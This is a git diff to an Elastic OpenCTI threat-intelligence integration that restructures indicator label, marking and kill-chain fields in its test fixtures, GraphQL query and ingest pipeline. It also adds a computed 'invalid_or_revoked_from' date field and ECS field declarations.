a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json @@ -23,53 +23,33 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - }, - { - "node": { - "value": "unit42" - } - }, - { - "node": { - "value": "steganography" - } - }, - { - "node": { - "value": "stegbaus" - } - }, - { - "node": { - "value": "runpe" - } - }, - { - "node": { - "value": "loader" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "malware" + }, + { + "value": "unit42" + }, + { + "value": "steganography" + }, + { + "value": "stegbaus" + }, + { + "value": "runpe" + }, + { + "value": "loader" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -106,4 +86,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json index 5377201b26c..9e3a9f888ec 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-02-10T21:37:17.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json index 685938bd19c..c8f0280c075 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json @@ -23,128 +23,78 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "android" - } - }, - { - "node": { - "value": "macosx" - } - }, - { - "node": { - "value": "watering hole" - } - }, - { - "node": { - "value": "tran duy linh" - } - }, - { - "node": { - "value": "spearphishing" - } - }, - { - "node": { - "value": "scarlet mimic" - } - }, - { - "node": { - "value": "fakem" - } - }, - { - "node": { - "value": "mnkit" - } - }, - { - "node": { - "value": "crypticconvo" - } - }, - { - "node": { - "value": "mobileorder" - } - }, - { - "node": { - "value": "raidbase" - } - }, - { - "node": { - "value": "skiboot" - } - }, - { - "node": { - "value": "psylo" - } - }, - { - "node": { - "value": "uyghurs" - } - }, - { - "node": { - "value": "wingd" - } - }, - { - "node": { - "value": "fakehighfive" - } - }, - { - "node": { - "value": "brutishcommand" - } - }, - { - "node": { - "value": "subtractthis" - } - }, - { - "node": { - "value": "fullthrottle" - } - }, - { - "node": { - "value": "piggyback" - } - }, - { - "node": { - "value": "fakefish" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "android" + }, + { + "value": "macosx" + }, + { + "value": "watering hole" + }, + { + "value": "tran duy linh" + }, + { + "value": "spearphishing" + }, + { + "value": "scarlet mimic" + }, + { + "value": "fakem" + }, + { + "value": "mnkit" + }, + { + "value": "crypticconvo" + }, + { + "value": "mobileorder" + }, + { + "value": "raidbase" + }, + { + "value": "skiboot" + }, + { + "value": "psylo" + }, + { + "value": "uyghurs" + }, + { + "value": "wingd" + }, + { + "value": "fakehighfive" + }, + { + "value": "brutishcommand" + }, + { + "value": "subtractthis" + }, + { + "value": "fullthrottle" + }, + { + "value": "piggyback" + }, + { + "value": "fakefish" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -166,4 +116,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json index ba8efe8c500..1451cbb7502 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-23T14:00:35.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json index 9e3fcc26634..803dfc6d1c1 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json @@ -23,53 +23,33 @@ "identity_class": "organization", "name": "MalwareMustDie" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - }, - { - "node": { - "value": "linux" - } - }, - { - "node": { - "value": "botnet" - } - }, - { - "node": { - "value": "password brute forcing" - } - }, - { - "node": { - "value": "machine-access-control" - } - }, - { - "node": { - "value": "ongoing" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + }, + { + "value": "linux" + }, + { + "value": "botnet" + }, + { + "value": "password brute forcing" + }, + { + "value": "machine-access-control" + }, + { + "value": "ongoing" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -91,4 +71,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json index 489d91f2e00..adb5b2e3607 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2020-04-08T11:00:32.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json index d0170d9fe87..74455768c5e 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json @@ -23,38 +23,24 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "osint" - } - }, - { - "node": { - "value": "blog-post" - } - }, - { - "node": { - "value": "testing" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "osint" + }, + { + "value": "blog-post" + }, + { + "value": "testing" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -76,4 +62,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json index fd71a0ba00d..2675c92262e 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-12-07T09:45:15.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json index e8024e2d82f..f479a35d94d 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json @@ -23,63 +23,39 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "office" - } - }, - { - "node": { - "value": "turla" - } - }, - { - "node": { - "value": "sofacy" - } - }, - { - "node": { - "value": "apt28" - } - }, - { - "node": { - "value": "0day" - } - }, - { - "node": { - "value": "fireeye" - } - }, - { - "node": { - "value": "netwire" - } - }, - { - "node": { - "value": "gamefish" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "office" + }, + { + "value": "turla" + }, + { + "value": "sofacy" + }, + { + "value": "apt28" + }, + { + "value": "0day" + }, + { + "value": "fireeye" + }, + { + "value": "netwire" + }, + { + "value": "gamefish" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -101,4 +77,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json index 12c27e74e9d..5652a1159bd 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-05-09T18:56:06.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json index 98fc3e294d0..11d90ed7a75 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "scam" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "scam" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -56,4 +46,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json index 91a14866b7d..0635b7e69bd 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-10-31T15:00:07.000Z", "is_inferred": false, "lang": "en", "observables_count": 0, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json index 330493abd92..f54a2249cef 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json @@ -23,15 +23,9 @@ "identity_class": "tester", "name": "Manual" }, - "objectMarking": { - "edges": [] - }, - "objectLabel": { - "edges": [] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [], + "objectLabel": [], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -64,4 +58,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json index 53bd5105eb0..132bab30a4a 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "tester", "detection": false, + "invalid_or_revoked_from": "2017-10-22T14:00:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json index a678b3d2818..2bcc2db06d2 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json @@ -23,96 +23,60 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "rat" - } - }, - { - "node": { - "value": "kaspersky" - } - }, - { - "node": { - "value": "windows" - } - }, - { - "node": { - "value": "israel" - } - }, - { - "node": { - "value": "india" - } - }, - { - "node": { - "value": "keylogger" - } - }, - { - "node": { - "value": "hawkeye" - } - }, - { - "node": { - "value": "cybergate" - } - }, - { - "node": { - "value": "nanocore" - } - }, - { - "node": { - "value": "darkcomet" - } - }, - { - "node": { - "value": "grabit" - } - }, - { - "node": { - "value": "cyborg" - } - } - ] - }, - "killChainPhases": { - "edges": [ - { - "node": { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - }, - { - "node": { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } - } - ] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "rat" + }, + { + "value": "kaspersky" + }, + { + "value": "windows" + }, + { + "value": "israel" + }, + { + "value": "india" + }, + { + "value": "keylogger" + }, + { + "value": "hawkeye" + }, + { + "value": "cybergate" + }, + { + "value": "nanocore" + }, + { + "value": "darkcomet" + }, + { + "value": "grabit" + }, + { + "value": "cyborg" + } + ], + "killChainPhases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], "externalReferences": { "edges": [] }, @@ -124,4 +88,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json index 54eff73480b..0a06741bbc3 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-23T14:00:11.000Z", "is_inferred": false, "kill_chain_phase": [ "[mitre-attack] defense-evasion", diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json index 2352958ec26..a49eac6c841 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json @@ -23,153 +23,93 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "isspace" - } - }, - { - "node": { - "value": "flash" - } - }, - { - "node": { - "value": "menupass" - } - }, - { - "node": { - "value": "sofacy" - } - }, - { - "node": { - "value": "hacking team" - } - }, - { - "node": { - "value": "sednit" - } - }, - { - "node": { - "value": "apt12" - } - }, - { - "node": { - "value": "apt3" - } - }, - { - "node": { - "value": "ups" - } - }, - { - "node": { - "value": "wekby" - } - }, - { - "node": { - "value": "httpbrowser" - } - }, - { - "node": { - "value": "apt18" - } - }, - { - "node": { - "value": "evilgrab" - } - }, - { - "node": { - "value": "plugx" - } - }, - { - "node": { - "value": "apt10" - } - }, - { - "node": { - "value": "gh0st" - } - }, - { - "node": { - "value": "t5000" - } - }, - { - "node": { - "value": "dnscalc" - } - }, - { - "node": { - "value": "conimes" - } - }, - { - "node": { - "value": "apt20" - } - }, - { - "node": { - "value": "california roll" - } - }, - { - "node": { - "value": "shadowserver" - } - }, - { - "node": { - "value": "terminator" - } - }, - { - "node": { - "value": "emdivi" - } - }, - { - "node": { - "value": "linopid" - } - }, - { - "node": { - "value": "hothot" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "isspace" + }, + { + "value": "flash" + }, + { + "value": "menupass" + }, + { + "value": "sofacy" + }, + { + "value": "hacking team" + }, + { + "value": "sednit" + }, + { + "value": "apt12" + }, + { + "value": "apt3" + }, + { + "value": "ups" + }, + { + "value": "wekby" + }, + { + "value": "httpbrowser" + }, + { + "value": "apt18" + }, + { + "value": "evilgrab" + }, + { + "value": "plugx" + }, + { + "value": "apt10" + }, + { + "value": "gh0st" + }, + { + "value": "t5000" + }, + { + "value": "dnscalc" + }, + { + "value": "conimes" + }, + { + "value": "apt20" + }, + { + "value": "california roll" + }, + { + "value": "shadowserver" + }, + { + "value": "terminator" + }, + { + "value": "emdivi" + }, + { + "value": "linopid" + }, + { + "value": "hothot" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -191,4 +131,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json index d85e82d127a..4af29337afb 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-10-22T14:00:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json index e7e699eba83..da7377ae284 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -56,4 +46,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json index 5eb0ea2b1bc..c3baa566221 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": true, + "invalid_or_revoked_from": "2017-04-26T10:57:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 0, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json index 94dbd5acf82..1d890006642 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "technical-report" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "technical-report" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -68,4 +58,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json index 6cf37f89b56..f298cc45139 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-10-25T14:13:17.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs b/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs index 4a31db95433..8ba626e1770 100644 --- a/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs +++ b/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs @@ -140,27 +140,15 @@ state: name } objectMarking { - edges { - node { - definition_type - definition - } - } + definition_type + definition } objectLabel { - edges { - node { - value - } - } + value } killChainPhases { - edges { - node { - phase_name - kill_chain_name - } - } + phase_name + kill_chain_name } externalReferences(first: 100) { edges { diff --git a/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml b/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml index e7503a39389..a406a1f3049 100644 --- a/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml @@ -126,6 +126,16 @@ processors: - rename: field: valid_until target_field: opencti.indicator.valid_until + - script: + lang: painless + source: | + if (ctx.opencti.indicator.revoked == true && + ctx.threat.indicator.modified_at.compareTo(ctx.opencti.indicator.valid_until) < 0) { + ctx.opencti.indicator.invalid_or_revoked_from = ctx.threat.indicator.modified_at; + } else { + // valid_until always has a value, will be epoch + 10^14 ms if no other value + ctx.opencti.indicator.invalid_or_revoked_from = ctx.opencti.indicator.valid_until; + } - rename: field: x_opencti_score target_field: opencti.indicator.score @@ -155,10 +165,10 @@ processors: - gsub: if: | - ctx.objectMarking.edges != null && - !ctx.objectMarking.edges.isEmpty() && - ctx.objectMarking.edges[0].node.definition_type == "TLP" - field: objectMarking.edges.0.node.definition + ctx.objectMarking != null && + !ctx.objectMarking.isEmpty() && + ctx.objectMarking[0].definition_type == "TLP" + field: objectMarking.0.definition pattern: '^TLP:' replacement: '' target_field: threat.indicator.marking.tlp @@ -166,23 +176,23 @@ processors: field: objectMarking - foreach: - field: objectLabel.edges + field: objectLabel ignore_missing: true processor: append: field: tags - value: "{{{_ingest._value.node.value}}}" + value: "{{{_ingest._value.value}}}" allow_duplicates: false - remove: field: objectLabel - foreach: - field: killChainPhases.edges + field: killChainPhases ignore_missing: true processor: append: field: opencti.indicator.kill_chain_phase - value: "[{{{_ingest._value.node.kill_chain_name}}}] {{{_ingest._value.node.phase_name}}}" + value: "[{{{_ingest._value.kill_chain_name}}}] {{{_ingest._value.phase_name}}}" - remove: field: killChainPhases diff --git a/packages/ti_opencti/data_stream/indicator/fields/ecs.yml b/packages/ti_opencti/data_stream/indicator/fields/ecs.yml index 768e327c45e..8e6f9b7386d 100644 --- a/packages/ti_opencti/data_stream/indicator/fields/ecs.yml +++ b/packages/ti_opencti/data_stream/indicator/fields/ecs.yml @@ -14,3 +14,162 @@ - name: threat.indicator.file.hash.sha3_512 type: keyword description: SHA3-512 hash. +# External ECS defintions, required by the transform +- external: ecs + name: ecs.version +- external: ecs + name: event.agent_id_status +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.dataset +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.type +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: tags +- external: ecs + name: threat.feed.dashboard_id +- external: ecs + name: threat.feed.description +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.feed.reference +- external: ecs + name: threat.indicator.as.number +- external: ecs + name: threat.indicator.as.organization.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.accessed +- external: ecs + name: threat.indicator.file.created +- external: ecs + name: threat.indicator.file.directory +- external: ecs + name: threat.indicator.file.drive_letter +- external: ecs + name: threat.indicator.file.extension +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.hash.sha384 +- external: ecs + name: threat.indicator.file.hash.sha512 +- external: ecs + name: threat.indicator.file.hash.ssdeep +- external: ecs + name: threat.indicator.file.hash.tlsh +- external: ecs + name: threat.indicator.file.mime_type +- external: ecs + name: threat.indicator.file.mtime +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.file.path +- external: ecs + name: threat.indicator.file.size +- external: ecs + name: threat.indicator.file.type +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.marking.tlp +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.port +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.registry.data.bytes +- external: ecs + name: threat.indicator.registry.data.strings +- external: ecs + name: threat.indicator.registry.data.type +- external: ecs + name: threat.indicator.registry.hive +- external: ecs + name: threat.indicator.registry.key +- external: ecs + name: threat.indicator.registry.path +- external: ecs + name: threat.indicator.registry.value +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.fragment +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.password +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.query +- external: ecs + name: threat.indicator.url.registered_domain +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.subdomain +- external: ecs + name: threat.indicator.url.top_level_domain +- external: ecs + name: threat.indicator.url.username +- external: ecs + name: threat.indicator.x509.alternative_names +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.public_key_algorithm +- external: ecs + name: threat.indicator.x509.public_key_exponent +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml b/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml new file mode 100644 index 00000000000..8ce0fb6caaf --- /dev/null +++ b/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml @@ -0,0 +1,4 @@ +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if the document is a source for the transform. This field is not added to destination indices to facilitate easier filtering of indicators for indicator match rules. diff --git a/packages/ti_opencti/data_stream/indicator/fields/opencti.yml b/packages/ti_opencti/data_stream/indicator/fields/opencti.yml index d799ff43646..2b4f5d0ff2f 100644 --- a/packages/ti_opencti/data_stream/indicator/fields/opencti.yml +++ b/packages/ti_opencti/data_stream/indicator/fields/opencti.yml @@ -33,6 +33,9 @@ - name: valid_until type: date description: The time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents. + - name: invalid_or_revoked_from + type: date + description: A time from which this indicator should be considered invalid or revoked. - 